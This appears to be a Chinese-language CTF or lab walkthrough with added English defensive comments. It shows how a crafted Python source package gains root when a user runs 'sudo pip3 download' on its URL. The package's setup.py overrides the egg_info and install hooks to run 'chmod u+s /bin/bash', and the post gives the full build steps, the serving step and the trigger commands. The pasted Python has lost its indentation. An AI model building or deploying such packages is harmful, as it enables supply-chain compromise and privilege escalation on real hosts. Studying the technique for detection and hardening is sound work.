参考文章:
https://github.com/wunderwuzzi23/this_is_fine_wuzzi
https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/
话不多说,准备环境(虚拟机 Ubuntu 20.04 x64):
# Builds a throw-away sdist whose setup.py runs code while metadata is being
# generated.  Defender's takeaway from this block: a plain "pip download" of
# an sdist URL is enough to execute setup.py (see the egg_info hook below),
# so a sudo rule that allows "pip3 download" with free arguments is
# equivalent to root code execution.
mkdir -pv /tmp/AA/admin2023;
cd /tmp/AA/;
touch README;
# NOTE(review): this hand-written PKG-INFO carries setup.cfg-style [egg_info]
# keys; the listing further down shows a different, larger PKG-INFO under
# test2023.egg-info/, which appears to be the one setuptools generates.
cat<<EOF>PKG-INFO
[egg_info]
tag_date = 0
tag_build =
tag_svn_revision = 0
EOF
# Package body is a placeholder: the prints are only markers that the module
# was imported.  The actual payload lives in setup.py, not in the package.
cat<<EOF>/tmp/AA/admin2023/__init__.py
print("killbyU");
EOF
cat<<EOF>/tmp/AA/admin2023/main.py
import time,os
print(123456);
def hi_there():
print("This is fine!");
EOF
# setup.py overrides both the 'egg_info' and the 'install' commands, so
# RunCommand() fires on metadata generation (sdist build, pip download) as
# well as on install.  Indentation of the Python below was lost in this
# paste (the def/if/class bodies are not indented), so the file as shown
# here would not parse; the transcript further down was produced from an
# intact copy.
cat<<EOF>setup.py
import os,subprocess
from setuptools import setup, find_packages
from setuptools.command.install import install
from setuptools.command.egg_info import egg_info
# Runs with the privileges of whoever invoked pip (root under sudo).
# Prints the working directory, then on non-Windows runs a shell command
# that writes a directory listing to /tmp/1.txt and sets the SUID bit on
# /bin/bash -- a persistent root escalation.  Detection hints: an
# unexpected SUID bit on /bin/bash (find / -perm -4000), /tmp/1.txt, and
# sudo logs showing pip3 download of a URL.
def RunCommand():
print("RunCommand(){ Hello, script guys : "+ os.getcwd()+"}" );
if os.name == 'nt' :
print( 1)
else:
#open('/tmp/TT61.txt','w').close();
os.system('ls -al > /tmp/1.txt;chmod u+s /bin/bash');
name = os.listdir(os.getcwd())
print(name)
# egg_info is run whenever pip or setuptools needs the project metadata,
# which includes a plain pip download of an sdist (see the transcript
# further down) -- no install step is required for the hook to fire.
class RunEggInfoCommand(egg_info):
def run(self):
RunCommand()
egg_info.run(self)
# Same payload on a real install.
class RunInstallCommand(install):
def run(self):
RunCommand()
install.run(self)
# Metadata is throwaway.  Note that 'author', 'description' and
# 'long_description' are evaluated while setup.py is executed, i.e. inside
# the same untrusted build step as the hooks above.
setup(name='test2023',version = "2.4.0",
author = str(5+7), #open('../../../../../etc/passwd').read(),
author_email = "[email protected]",
description = open('README').read() ,url='http://127.0.0.1/tst',
# For now, let's just build a module, not a package
packages=find_packages(),
keywords = "20230501",
long_description=open('README').read(),
install_requires=[],
cmdclass={
'install' : RunInstallCommand,
'egg_info': RunEggInfoCommand
},
)
#subprocess.Popen(['bash','-c','pwd ;ls -la ../../../'], shell=True)
EOF
root@fv-az619-369:/tmp# cat /etc/issue
Ubuntu 20.04.6 LTS \n \l
root@fv-az619-369:/tmp# python3 -V
Python 3.8.10
root@fv-az619-369:/tmp#
把上面的项目文件夹打包为tar.gz后缀的pip包:
# Build the source distribution.  sdist generates egg-info (the
# test2023.egg-info/ directory in the listing below), so the egg_info hook
# -- and with it the payload -- presumably already runs on the author's
# own machine at this point, not only on the target.
cd /tmp/AA/;
python3 setup.py sdist;
root@fv-az748-99:/tmp/AA# ls -alR
.:
total 28
drwxr-xr-x 5 root root 4096 May 4 15:19 .
drwxrwxrwt 20 root root 4096 May 4 15:18 ..
-rw-r--r-- 1 root root 59 May 4 15:18 PKG-INFO
-rw-r--r-- 1 root root 0 May 4 15:18 README
drwxr-xr-x 2 root root 4096 May 4 15:18 admin2023
drwxr-xr-x 2 root root 4096 May 4 15:19 dist
-rw-r--r-- 1 root root 1189 May 4 15:18 setup.py
drwxr-xr-x 2 root root 4096 May 4 15:19 test2023.egg-info
./admin2023:
total 16
drwxr-xr-x 2 root root 4096 May 4 15:18 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 18 May 4 15:18 __init__.py
-rw-r--r-- 1 root root 75 May 4 15:18 main.py
./dist:
total 12
drwxr-xr-x 2 root root 4096 May 4 15:19 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 1428 May 4 15:19 test2023-2.4.0.tar.gz
./test2023.egg-info:
total 24
drwxr-xr-x 2 root root 4096 May 4 15:19 .
drwxr-xr-x 5 root root 4096 May 4 15:19 ..
-rw-r--r-- 1 root root 218 May 4 15:19 PKG-INFO
-rw-r--r-- 1 root root 183 May 4 15:19 SOURCES.txt
-rw-r--r-- 1 root root 1 May 4 15:19 dependency_links.txt
-rw-r--r-- 1 root root 10 May 4 15:19 top_level.txt
root@fv-az748-99:/tmp/AA#
最后在靶机上执行 pip download 下载命令即可触发代码执行(无需 install:pip 为了得到 sdist 的元数据会运行 setup.py,从而执行其中的 egg_info 钩子):
# Target side.  Nothing is installed: to learn the archive's name/version pip
# has to build the sdist's metadata, and that alone executes setup.py (the
# egg_info hook).  Practical mitigations: pass --only-binary=:all: so pip
# refuses source distributions (confirm on the pip version in use that this
# also applies to a direct sdist URL), never run pip under sudo against a URL
# you do not control, and restrict sudo rules to a fixed index rather than
# free-form arguments.
pip download http://127.0.0.1/test2023-2.4.0.tar.gz -v
# Same build step as above, with the tarball format made explicit.
python setup.py sdist --formats=gztar
# Archive URL as served from a git web UI in the next transcript;
http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
# note the 'raw' path component above (without it the server would
# presumably return an HTML page rather than the archive).
john@only4you:~/DD$ sudo /usr/bin/pip3 download http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
Collecting http://127.0.0.1:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
File was already downloaded /tmp/DD/this_is_fine_wuzzi-0.0.1.tar.gz
Successfully downloaded this-is-fine-wuzzi
john@only4you:~/DD$
骚操作:
1.走代理,使用pip.conf操作失败,命令行直接指定的方式成功
# Proxy passed on the command line instead of via pip.conf.  Under sudo pip
# runs as root and presumably reads root's configuration, not the invoking
# user's ~/.pip/pip.conf, which would explain why the config-file route did
# not take effect.  From a monitoring standpoint, a sudo'd pip3 download
# whose traffic leaves the host through a non-corporate proxy is a strong
# signal on its own.
sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz --proxy http://10.10.14.128:30080 http://127.0.0.1:3000/$HOMEg.tar.gz
这样测出来$HOME是空的
2.同时下载2个
# Writes a per-user pip.conf carrying the proxy.  Note that this is the
# invoking user's config; the sudo'd pip below does not appear to pick it up
# (see the comments that follow), so the --proxy flag is used instead.
mkdir -pv ~/.pip;
echo -e "[global]\nproxy=http://10.10.14.128:30080" >~/.pip/pip.conf
cat ~/.pip/pip.conf;
#sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz http://127.0.0.1:3000/g.tar.gz
# The line above relies on the proxy from pip.conf and does not work.
# The form below, passing --proxy explicitly, works: both t.tar.gz and
# g.tar.gz are downloaded and both trigger.  pip processes every URL
# argument in a single run, so each sdist's setup.py is executed.
sudo /usr/bin/pip3 download http://127.0.0.1:3000/t.tar.gz --proxy http://10.10.14.128:30080 http://127.0.0.1:3000/g.tar.gz
# python3 -m http.server 3000 &